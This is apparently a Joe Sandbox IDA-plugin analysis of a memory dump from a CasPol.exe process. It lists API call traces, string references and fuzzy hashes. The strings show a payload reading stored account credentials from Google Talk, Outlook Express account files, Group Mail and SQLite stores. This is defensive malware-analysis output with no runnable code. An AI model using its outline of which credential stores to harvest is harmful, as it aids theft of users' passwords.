• Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
• Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
• Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65

                                                                                                                                                                                    Control-flow Graph (graph image: basic blocks 4034e4-403582, calling memset, _mbscpy, _mbscat and subcalls 410b1e, 406d55, 4033f0)
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00403504
                                                                                                                                                                                    • memset.MSVCRT ref: 0040351A
                                                                                                                                                                                      • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                                                                                                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040356D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                                                                    • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                                                    • API String ID: 3071782539-966475738
                                                                                                                                                                                    • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                                                                                                                    • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                                                                                                    • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                                                                                                                    • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                                                                                                                                                                                    Control-flow Graph (graph image: basic blocks 408db6-408f0b, calling _mbscpy, strlen, LoadStringA, memcpy and subcalls 408d34, 409240, 408f0c)
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                      • Part of subcall function 00409240: _itoa.MSVCRT ref: 00409261
                                                                                                                                                                                    • strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                    • LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                      • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D5C
                                                                                                                                                                                      • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D7A
                                                                                                                                                                                      • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D98
                                                                                                                                                                                      • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408DA8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408DCA
                                                                                                                                                                                    • strings, xrefs: 00408E27
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                                                                                                                                                                    • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                                                                                                                                                                    • API String ID: 4036804644-4125592482
                                                                                                                                                                                    • Opcode ID: 93499d40d0ac09f03a262576db3bd02ec7d22a5ce3c652b96661fe7e7ae87012
                                                                                                                                                                                    • Instruction ID: 8088189cea062d7f30cfe1d816b9e84d6c9af13e32ba145f50863190e1f773ff
                                                                                                                                                                                    • Opcode Fuzzy Hash: 93499d40d0ac09f03a262576db3bd02ec7d22a5ce3c652b96661fe7e7ae87012
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B3170B1101722AFD715DB15ED41E733766E7803067124A3FE981972A3CB39E8A1CB9E

                                                                                                                                                                                    Control-flow Graph (graph image: basic blocks 410863-4108e2, calling UuidFromStringA, memcpy, CoTaskMemFree and subcall 410827)
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                    • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 004108D2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                                                                                                                    • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                    • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                                                    • API String ID: 1640410171-3316789007
                                                                                                                                                                                    • Opcode ID: 22d987936c379f2ddbe1f4d72e7ed5a7e1d5b1ee58518d6b198fa6640511f7ba
                                                                                                                                                                                    • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 22d987936c379f2ddbe1f4d72e7ed5a7e1d5b1ee58518d6b198fa6640511f7ba
                                                                                                                                                                                    • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D13
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                                                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                                                                                                      • Part of subcall function 00407560: ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                      • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                      • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                                                                                                      • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                      • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                      • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                      • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                                                                                                    • CloseHandle.KERNELBASE(?), ref: 00444206
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                                                    • String ID: ACD
                                                                                                                                                                                    • API String ID: 1886237854-620537770
                                                                                                                                                                                    • Opcode ID: e6911fb76e44905f99aae04da62e88cbef3e0e1df9b19c178b82a06b9eab0b64
                                                                                                                                                                                    • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                                                                                                    • Opcode Fuzzy Hash: e6911fb76e44905f99aae04da62e88cbef3e0e1df9b19c178b82a06b9eab0b64
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2054149589-0
                                                                                                                                                                                    • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                                                                                                                    • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                                                                                                    • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                                                                                                                    • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
  • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
  • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
• memset.MSVCRT ref: 00408620
  • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
• memset.MSVCRT ref: 00408671
• RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
• RegCloseKey.ADVAPI32(?), ref: 004086D6
Strings
• Software\Google\Google Talk\Accounts, xrefs: 004085F1
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
• String ID: Software\Google\Google Talk\Accounts
• API String ID: 1366857005-1079885057
• Opcode ID: e382b87db7f0bd43b4e3522d782a37f7f61fb274bdede134f0936f9282285683
• Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
• Opcode Fuzzy Hash: e382b87db7f0bd43b4e3522d782a37f7f61fb274bdede134f0936f9282285683
• Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
APIs
  • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll), ref: 00410D1C
  • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
• SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
• memset.MSVCRT ref: 00410E10
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
• _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
  • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
Strings
• Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersion_mbscpymemset
• String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
• API String ID: 3929982141-2036018995
• Opcode ID: 7ac12f80f2b375b89f7afb4171d908dc2817b99221bb223db89aef840bd4f41a
• Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
• Opcode Fuzzy Hash: 7ac12f80f2b375b89f7afb4171d908dc2817b99221bb223db89aef840bd4f41a
• Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: Cursor_mbsicmpqsort
• String ID: /nosort$/sort
• API String ID: 882979914-1578091866
• Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
• Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
• Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
• Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
APIs
• memset.MSVCRT ref: 004109F7
  • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
  • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
• WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
• memset.MSVCRT ref: 00410A32
• GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: PrivateProfileStringmemset$Writememcpysprintf
• String ID:
• API String ID: 3143880245-0
• Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
• Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
• Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
• Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: ??2@
• String ID:
• API String ID: 1033339047-0
• Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
• Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
• Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
• Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
APIs
• memset.MSVCRT ref: 00402A34
  • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
• RegCloseKey.KERNEL32(?,?,?), ref: 00402A7A
• RegCloseKey.KERNEL32 ref: 00402A95
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: Close$Enummemset
• String ID:
• API String ID: 1615280680-0
• Opcode ID: a95c34967b0cb9b80c80469a4993c45ab25de0f8a69c3d9d5225f488b7e1c4ba
• Instruction ID: 4e227b58271400dae14a407a15e496f509ceac9baab3320f2be5fe13b191b239
• Opcode Fuzzy Hash: a95c34967b0cb9b80c80469a4993c45ab25de0f8a69c3d9d5225f488b7e1c4ba
• Instruction Fuzzy Hash: D10179B590000CFFEB21EF51CD81EEA776DDF50388F100076BA84A1051E6759E959A64
APIs
• malloc.MSVCRT ref: 00406F4C
• memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
• free.MSVCRT ref: 00406F6D
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: freemallocmemcpy
• String ID:
• API String ID: 3056473165-0
• Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
• Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
• Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
• Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
APIs
  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
  • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
• RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: sqlite3.dll
• API String ID: 3677997916-1155512374
• Opcode ID: 8e969e5ca9bf6096602a78be3d4e5059fdca8f737fa6ec707583d0e92d73378d
• Instruction ID: 87b963fc64edc678a4f0440c700721264c86d0e3755c9c93a3ce53f579e10251
• Opcode Fuzzy Hash: 8e969e5ca9bf6096602a78be3d4e5059fdca8f737fa6ec707583d0e92d73378d
• Instruction Fuzzy Hash: 3DE0C972A00119BBDF11AF91DD06ADA7BA9EF14298B000061FD0591221E776DEA4EAD4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D13
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID: eBD
                                                                                                                                                                                    • API String ID: 823142352-44267735
                                                                                                                                                                                    • Opcode ID: 245fd492edc90e6f7beb3f7fe0fc2542e4d9025ddba3e970a97606beca3aa0ab
                                                                                                                                                                                    • Instruction ID: a89d01311c626acd6708100a1c920bed7e48ab8185d3fa7f8c0eae74851e3e32
                                                                                                                                                                                    • Opcode Fuzzy Hash: 245fd492edc90e6f7beb3f7fe0fc2542e4d9025ddba3e970a97606beca3aa0ab
                                                                                                                                                                                    • Instruction Fuzzy Hash: 10C012B0250300BEFF214F10EC46F37355DE740700F300424BE00F40E1C1A14D10C928
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                    • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                                                                                                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                    • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strlen$_strcmpimemset
                                                                                                                                                                                    • String ID: /stext
                                                                                                                                                                                    • API String ID: 520177685-3817206916
                                                                                                                                                                                    • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                                                                                                    • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                    • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                    • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00402B44
                                                                                                                                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                    • RegCloseKey.ADVAPI32 ref: 00402BBD
                                                                                                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                      • Part of subcall function 00402A9D: memset.MSVCRT ref: 00402ABC
                                                                                                                                                                                      • Part of subcall function 00402A9D: RegCloseKey.ADVAPI32 ref: 00402B17
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Closememset$EnumOpenmemcpystrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1880195650-0
                                                                                                                                                                                    • Opcode ID: 5347bd042121d238431eb3b74689eb21bcf5dbb0349685f5868c10f604f2f03d
                                                                                                                                                                                    • Instruction ID: a6739743e39ca8df578777331d88ee5d3d666d95225ddaf8fc8e93cdb73399e2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5347bd042121d238431eb3b74689eb21bcf5dbb0349685f5868c10f604f2f03d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4811B975904109EFEB10DF95CD41ED9B77CEF20348F1004BAF988A2151EAB5AAC49B14
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                    • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                                                                                                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
